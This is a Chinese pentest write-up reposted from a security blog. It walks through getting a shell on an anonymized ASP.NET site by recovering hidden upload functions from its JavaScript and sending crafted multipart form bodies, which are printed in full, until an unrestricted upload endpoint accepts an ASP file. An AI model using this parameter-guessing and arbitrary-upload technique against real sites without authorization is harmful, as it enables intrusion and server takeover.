实战 | 文件上传猜测表单参数Getshell
2022-12-12 10:10:23 Author: HACK学习君(查看原文) 阅读量:16 收藏

0x01 前言

大佬给了个上传点,说是这个点足够写一篇教程了,遂尝试一下,看自己得行不。
上传点如下:

https://subdomain.target.com/UpLoad/UpLoad.aspx

访问之,302跳转到User_Status

阅读本篇文章能了解到:上传getshell

0x02 猜测参数

没有任何功能点,显然是需要猜参数了,与其说是猜测不如说是构造,使用通用表单上传参数

1
2
3
4
5
6
7
8
9
Content-Type: multipart/form-data; boundary=--------1036030574

----------1036030574
Content-Disposition: form-data; name="Filedata"; filename="pic.jpg"
Content-Type: text/plain

123

----------1036030574--

oneForm

显然response并无变化,也没有上传成功的提示,更换几个常用的namefilename后一样无果
无头苍蝇般的猜测显然不行,查看源码找找有用信息
并无有价值信息,进一步查看jsjquery忽略不看,直接看第二个comfun.js

view-source

随便翻翻,果然发现点有用的东西,函数UpLoadPic

comfun.js-uploadPic

直接访问/UpLoad/UpLoadPic.aspx,一样302跳转到User_Status

uploadPic302

尝试把函数中的参数全部构造成表单提交

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
----------1036030574
Content-Disposition: form-data; name="ObjNM";
Content-Type: text/plain

1

----------1036030574
Content-Disposition: form-data; name="FilePath";
Content-Type: text/plain

pic.jpg

----------1036030574
Content-Disposition: form-data; name="UpLoadBtnNM";
Content-Type: text/plain

1

----------1036030574
Content-Disposition: form-data; name="DeleteBtnNM";
Content-Type: text/plain

1

----------1036030574
Content-Disposition: form-data; name="MaxFileSize";
Content-Type: text/plain

1

----------1036030574
Content-Disposition: form-data; name="MaxSize";
Content-Type: text/plain

1

----------1036030574
Content-Disposition: form-data; name="IsCover";
Content-Type: text/plain

1
----------1036030574--

上传页面出现了

uploadPic-post

果断上传asp,提示白名单

uploadPic-asp

iis8.0 并无解析漏洞,随便试试,爆出绝对路径D:\web_root\UpLoad,不知是否有用,先留着

root_path

继续fuzz,发现无法绕过,就连白名单的jpg都无法上传,经过多次fuzztxt可上传,并返回文件名

uploadPic-txt-1

根据上述绝对路径,直接加在/upload/,得到相对路径

uploadPic-txt-2

0x03 getshell

经测试,该上传点白名单无法绕过,遂放弃,另辟蹊径
继续回头看js,函数UpLoadPic下还有函数UpLoadFile

comfun.js-upload

同理构造表单上传,看到档案格式不限,感觉希望来了

upload-post

直接梭哈asp

upload-asp

哦豁,getshell!

getshell

0x04 总结

该篇重点在于构造表单参数,在扫到一些上传页面无按钮时不要放弃,猜测参数有时能一击必杀
另外headerboundary=--------1036030574不可缺少,表单分割线要保持一致
至于后面的就是找对功能点,任意上传了。

来源:https://redn3ck.github.io/2019/10/18/%E4%B8%8A%E4%BC%A0-%E7%8C%9C%E6%B5%8B%E8%A1%A8%E5%8D%95%E5%8F%82%E6%95%B0getshell/作者:redn3ck如有侵权,请联系删除


推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

2022年,从现在开始学安全还不迟!

干货 | 2022年超全的安全知识库

实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

其他更多精彩内容,欢迎加入我们的星球


文章来源: http://mp.weixin.qq.com/s?__biz=MzIzNzMxMDkxNw==&mid=2247492042&idx=1&sn=c12c967a0097b1ec4b22772376a4e09b&chksm=e8c82760dfbfae76e3e40568bf08d9ad19e2a4f4f788345e1530b59cde88f46822e86396c808#rd
如有侵权请联系:admin#unsafe.sh